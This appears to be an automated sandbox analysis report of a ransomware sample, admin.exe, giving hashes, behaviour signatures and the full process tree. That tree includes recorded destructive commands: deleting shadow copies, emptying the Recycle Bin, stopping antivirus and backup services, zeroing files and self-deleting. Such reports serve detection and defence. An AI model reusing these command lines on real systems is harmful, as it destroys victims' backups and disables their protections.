Analysis
-
max time kernel
91s -
max time network
129s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
17-04-2021 12:03
Static task
static1
Behavioral task
behavioral1
Sample
admin.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
admin.exe
Resource
win10v20210410
General
-
Target
admin.exe
-
Size
63KB
-
MD5
ae776cbf46e5d71831c0d0d6c37b3bbf
-
SHA1
3ee387589ef93afe4ed2609c0c242e29f5d164b4
-
SHA256
83e2ba9faf075547be65d2b6dbd13e190a0b1c1cf626788cb756ab7a3c770dcb
-
SHA512
486d0ce8e49b1ab0fd6a56d6982abad8661c35fb27343a623c7a58bf1f5a74ccff3a954d02e9713d501bb72e9dac829f459cad2f1b3cc225ce052568ee3785ee
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 7 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
admin.exedescription ioc process File created C:\Users\Admin\Pictures\CompareSend.tiff.locked admin.exe File opened for modification C:\Users\Admin\Pictures\CompareSend.tiff admin.exe File created C:\Users\Admin\Pictures\ConfirmUndo.tiff.locked admin.exe File opened for modification C:\Users\Admin\Pictures\ConfirmUndo.tiff admin.exe File created C:\Users\Admin\Pictures\EnterRegister.tiff.locked admin.exe File opened for modification C:\Users\Admin\Pictures\EnterRegister.tiff admin.exe File created C:\Users\Admin\Pictures\LimitRead.png.locked admin.exe -
Drops startup file 1 IoCs
Processes:
admin.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk admin.exe -
Enumerates connected drives 3 TTPs 18 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exedescription ioc process File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid process 2504 vssadmin.exe 2000 vssadmin.exe 2716 vssadmin.exe 4360 vssadmin.exe 4112 vssadmin.exe 2752 vssadmin.exe 3260 vssadmin.exe 5076 vssadmin.exe 2476 vssadmin.exe 2464 vssadmin.exe 1864 vssadmin.exe 4124 vssadmin.exe 3636 vssadmin.exe 1344 vssadmin.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 4492 taskkill.exe 4176 taskkill.exe 4744 taskkill.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 5296 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
admin.exepid process 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe 2016 admin.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
admin.exetaskkill.exetaskkill.exetaskkill.exevssvc.exedescription pid process Token: SeDebugPrivilege 2016 admin.exe Token: SeDebugPrivilege 4492 taskkill.exe Token: SeDebugPrivilege 4744 taskkill.exe Token: SeDebugPrivilege 4176 taskkill.exe Token: SeBackupPrivilege 5556 vssvc.exe Token: SeRestorePrivilege 5556 vssvc.exe Token: SeAuditPrivilege 5556 vssvc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
admin.exepid process 2016 admin.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
admin.exepid process 2016 admin.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
admin.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 2016 wrote to memory of 2456 2016 admin.exe net.exe PID 2016 wrote to memory of 2456 2016 admin.exe net.exe PID 2016 wrote to memory of 2456 2016 admin.exe net.exe PID 2016 wrote to memory of 2488 2016 admin.exe net.exe PID 2016 wrote to memory of 2488 2016 admin.exe net.exe PID 2016 wrote to memory of 2488 2016 admin.exe net.exe PID 2016 wrote to memory of 2512 2016 admin.exe net.exe PID 2016 wrote to memory of 2512 2016 admin.exe net.exe PID 2016 wrote to memory of 2512 2016 admin.exe net.exe PID 2016 wrote to memory of 2764 2016 admin.exe net.exe PID 2016 wrote to memory of 2764 2016 admin.exe net.exe PID 2016 wrote to memory of 2764 2016 admin.exe net.exe PID 2016 wrote to memory of 3044 2016 admin.exe net.exe PID 2016 wrote to memory of 3044 2016 admin.exe net.exe PID 2016 wrote to memory of 3044 2016 admin.exe net.exe PID 2016 wrote to memory of 3552 2016 admin.exe net.exe PID 2016 wrote to memory of 3552 2016 admin.exe net.exe PID 2016 wrote to memory of 3552 2016 admin.exe net.exe PID 2016 wrote to memory of 3472 2016 admin.exe net.exe PID 2016 wrote to memory of 3472 2016 admin.exe net.exe PID 2016 wrote to memory of 3472 2016 admin.exe net.exe PID 2016 wrote to memory of 2768 2016 admin.exe net.exe PID 2016 wrote to memory of 2768 2016 admin.exe net.exe PID 2016 wrote to memory of 2768 2016 admin.exe net.exe PID 2016 wrote to memory of 1276 2016 admin.exe net.exe PID 2016 wrote to memory of 1276 2016 admin.exe net.exe PID 2016 wrote to memory of 1276 2016 admin.exe net.exe PID 2016 wrote to memory of 3148 2016 admin.exe net.exe PID 2016 wrote to memory of 3148 2016 admin.exe net.exe PID 2016 wrote to memory of 3148 2016 admin.exe net.exe PID 2016 wrote to memory of 2324 2016 admin.exe net.exe PID 2016 wrote to memory of 2324 2016 admin.exe net.exe PID 2016 wrote to memory of 2324 2016 admin.exe net.exe PID 2456 wrote to memory of 2716 2456 net.exe vssadmin.exe PID 2456 wrote to memory of 2716 2456 net.exe vssadmin.exe PID 2456 wrote to memory of 2716 2456 net.exe vssadmin.exe PID 2016 wrote to memory of 2208 2016 admin.exe net.exe PID 2016 wrote to memory of 2208 2016 admin.exe net.exe PID 2016 wrote to memory of 2208 2016 admin.exe net.exe PID 2764 wrote to memory of 3492 2764 net.exe net1.exe PID 2764 wrote to memory of 3492 2764 net.exe net1.exe PID 2764 wrote to memory of 3492 2764 net.exe net1.exe PID 2512 wrote to memory of 684 2512 net.exe net1.exe PID 2512 wrote to memory of 684 2512 net.exe net1.exe PID 2512 wrote to memory of 684 2512 net.exe net1.exe PID 2488 wrote to memory of 1364 2488 net.exe net1.exe PID 2488 wrote to memory of 1364 2488 net.exe net1.exe PID 2488 wrote to memory of 1364 2488 net.exe net1.exe PID 2016 wrote to memory of 1160 2016 admin.exe net.exe PID 2016 wrote to memory of 1160 2016 admin.exe net.exe PID 2016 wrote to memory of 1160 2016 admin.exe net.exe PID 2016 wrote to memory of 3152 2016 admin.exe net.exe PID 2016 wrote to memory of 3152 2016 admin.exe net.exe PID 2016 wrote to memory of 3152 2016 admin.exe net.exe PID 2016 wrote to memory of 1660 2016 admin.exe net.exe PID 2016 wrote to memory of 1660 2016 admin.exe net.exe PID 2016 wrote to memory of 1660 2016 admin.exe net.exe PID 3044 wrote to memory of 1864 3044 net.exe vssadmin.exe PID 3044 wrote to memory of 1864 3044 net.exe vssadmin.exe PID 3044 wrote to memory of 1864 3044 net.exe vssadmin.exe PID 3472 wrote to memory of 3852 3472 net.exe Conhost.exe PID 3472 wrote to memory of 3852 3472 net.exe Conhost.exe PID 3472 wrote to memory of 3852 3472 net.exe Conhost.exe PID 2016 wrote to memory of 2484 2016 admin.exe net.exe -
System policy modification 1 TTPs 2 IoCs
Processes:
admin.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" admin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" admin.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\admin.exe"C:\Users\Admin\AppData\Local\Temp\admin.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SysWOW64\net.exe"net.exe" stop avpsus /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BMR Boot Service /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfewc /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccSetMgr /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SavRoam /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RTVscan /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBFCService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooBackup /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop stc_raw_agent /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop zhudongfangyu /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooIT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBCFMonitorService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBIDPService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccEvtMgr /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DefWatch /y2⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VSNAPVSS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin2⤵
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophos /y2⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y2⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y2⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y2⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y2⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y2⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y2⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop veeam /y2⤵
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y2⤵
-
C:\Windows\SysWOW64\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt2⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\admin.exe2⤵
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 33⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DefWatch /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophos /y1⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop veeam /y1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txtMD5
7504b567104d256fbc540e0e5c67b227
SHA18097328e9f9400b7e484e6902d18b5de24098079
SHA25668123104072c44fcdd581c6515f4e4cb1dc887b0def30d547db12bbb45733e06
SHA512f82d02a526daa484e241996b0b6b56c888e6d1f06faea69911281ad2f621e1ac2c47bacacd3d54eb1fe596d023a145d618af2a24dea25591190bc38c58c574bb
-
memory/684-130-0x0000000000000000-mapping.dmp
-
memory/1160-132-0x0000000000000000-mapping.dmp
-
memory/1276-124-0x0000000000000000-mapping.dmp
-
memory/1364-131-0x0000000000000000-mapping.dmp
-
memory/1660-134-0x0000000000000000-mapping.dmp
-
memory/1864-135-0x0000000000000000-mapping.dmp
-
memory/2016-143-0x0000000004910000-0x0000000004911000-memory.dmpFilesize
4KB
-
memory/2016-181-0x0000000005860000-0x0000000005861000-memory.dmpFilesize
4KB
-
memory/2016-114-0x0000000000130000-0x0000000000131000-memory.dmpFilesize
4KB
-
memory/2208-128-0x0000000000000000-mapping.dmp
-
memory/2280-175-0x0000000000000000-mapping.dmp
-
memory/2324-126-0x0000000000000000-mapping.dmp
-
memory/2456-116-0x0000000000000000-mapping.dmp
-
memory/2484-137-0x0000000000000000-mapping.dmp
-
memory/2488-117-0x0000000000000000-mapping.dmp
-
memory/2512-118-0x0000000000000000-mapping.dmp
-
memory/2716-127-0x0000000000000000-mapping.dmp
-
memory/2756-140-0x0000000000000000-mapping.dmp
-
memory/2764-119-0x0000000000000000-mapping.dmp
-
memory/2768-123-0x0000000000000000-mapping.dmp
-
memory/3044-120-0x0000000000000000-mapping.dmp
-
memory/3148-125-0x0000000000000000-mapping.dmp
-
memory/3152-133-0x0000000000000000-mapping.dmp
-
memory/3180-138-0x0000000000000000-mapping.dmp
-
memory/3332-141-0x0000000000000000-mapping.dmp
-
memory/3472-122-0x0000000000000000-mapping.dmp
-
memory/3492-129-0x0000000000000000-mapping.dmp
-
memory/3552-121-0x0000000000000000-mapping.dmp
-
memory/3852-136-0x0000000000000000-mapping.dmp
-
memory/3856-142-0x0000000000000000-mapping.dmp
-
memory/4048-139-0x0000000000000000-mapping.dmp
-
memory/4160-144-0x0000000000000000-mapping.dmp
-
memory/4204-145-0x0000000000000000-mapping.dmp
-
memory/4216-146-0x0000000000000000-mapping.dmp
-
memory/4224-176-0x0000000000000000-mapping.dmp
-
memory/4228-147-0x0000000000000000-mapping.dmp
-
memory/4272-148-0x0000000000000000-mapping.dmp
-
memory/4324-177-0x0000000000000000-mapping.dmp
-
memory/4336-149-0x0000000000000000-mapping.dmp
-
memory/4384-150-0x0000000000000000-mapping.dmp
-
memory/4408-151-0x0000000000000000-mapping.dmp
-
memory/4436-152-0x0000000000000000-mapping.dmp
-
memory/4456-153-0x0000000000000000-mapping.dmp
-
memory/4484-154-0x0000000000000000-mapping.dmp
-
memory/4516-155-0x0000000000000000-mapping.dmp
-
memory/4528-156-0x0000000000000000-mapping.dmp
-
memory/4544-178-0x0000000000000000-mapping.dmp
-
memory/4568-157-0x0000000000000000-mapping.dmp
-
memory/4608-158-0x0000000000000000-mapping.dmp
-
memory/4628-179-0x0000000000000000-mapping.dmp
-
memory/4672-159-0x0000000000000000-mapping.dmp
-
memory/4680-160-0x0000000000000000-mapping.dmp
-
memory/4696-180-0x0000000000000000-mapping.dmp
-
memory/4704-161-0x0000000000000000-mapping.dmp
-
memory/4736-162-0x0000000000000000-mapping.dmp
-
memory/4748-163-0x0000000000000000-mapping.dmp
-
memory/4784-164-0x0000000000000000-mapping.dmp
-
memory/4804-165-0x0000000000000000-mapping.dmp
-
memory/4816-166-0x0000000000000000-mapping.dmp
-
memory/4856-167-0x0000000000000000-mapping.dmp
-
memory/4888-168-0x0000000000000000-mapping.dmp
-
memory/4920-169-0x0000000000000000-mapping.dmp
-
memory/4964-170-0x0000000000000000-mapping.dmp
-
memory/5004-171-0x0000000000000000-mapping.dmp
-
memory/5020-172-0x0000000000000000-mapping.dmp
-
memory/5032-173-0x0000000000000000-mapping.dmp
-
memory/5088-174-0x0000000000000000-mapping.dmp